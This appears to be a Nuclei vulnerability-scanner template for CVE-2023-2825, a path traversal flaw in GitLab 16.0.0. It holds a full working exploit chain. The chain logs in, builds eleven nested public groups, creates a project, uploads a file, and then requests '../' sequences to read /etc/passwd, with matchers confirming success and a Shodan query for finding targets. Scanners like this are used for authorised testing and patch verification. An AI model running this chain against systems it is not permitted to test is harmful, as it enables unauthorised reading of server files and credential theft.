id: CVE-2023-2825 info: name: GitLab 16.0.0 - Path Traversal author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch severity: high description: | An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups remediation: | Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825). reference: - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/ - https://github.com/Occamsec/CVE-2023-2825 - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2825 - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 epss-score: 0.06942 epss-percentile: 0.93215 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true max-request: 16 vendor: gitlab product: gitlab shodan-query: title:"Gitlab" tags: cve,cve2023,gitlab,lfi,kev,authenticated,intrusive variables: data: "{{rand_base(5)}}" http: - raw: - | GET /users/sign_in HTTP/1.1 Host: {{Hostname}} - | POST /users/sign_in HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: */* user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: */* group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | @timeout: 15s POST /projects HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}} - | POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1 Host: {{Hostname}} Accept: */* X-CSRF-Token: {{x-csrf-token}} Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6 --0ce2a9fbe06b6da89c138a35a1765ed6 Content-Disposition: form-data; name="file"; filename="{{randstr}}" {{randstr}} --0ce2a9fbe06b6da89c138a35a1765ed6-- - | GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} Accept: */* host-redirects: true matchers-condition: and matchers: - type: word words: - 726f6f743a78 encoding: hex - type: word part: header words: - application/octet-stream - etc%2Fpasswd condition: and extractors: - type: regex name: token_1 group: 1 regex: - name="authenticity_token" value="([A-Za-z0-9_-]+)" internal: true part: body - type: regex name: token_2 group: 1 regex: - name="csrf\-token" content="([A-Z_0-9a-z-]+)" internal: true part: body - type: regex name: parent_id group: 1 regex: - href="\/groups\/new\?parent_id=([0-9]+) internal: true part: body - type: regex name: namespace_id group: 1 regex: - ref="\/projects\/new\?namespace_id=([0-9]+) internal: true part: body - type: regex name: x-csrf-token group: 1 regex: - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)" internal: true part: body - type: regex name: upload-hash group: 1 regex: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body # digest: 490a0046304402204dd6642ac0eff433d5e6d99064b05f1076ad13d6949421020e6e1629e849c93e02205c76868656db0c1aefeeb166fbafd43247eda7b6c1c920db4f4e97ae9db44131:922c64590222798bb761d5b6d8e72950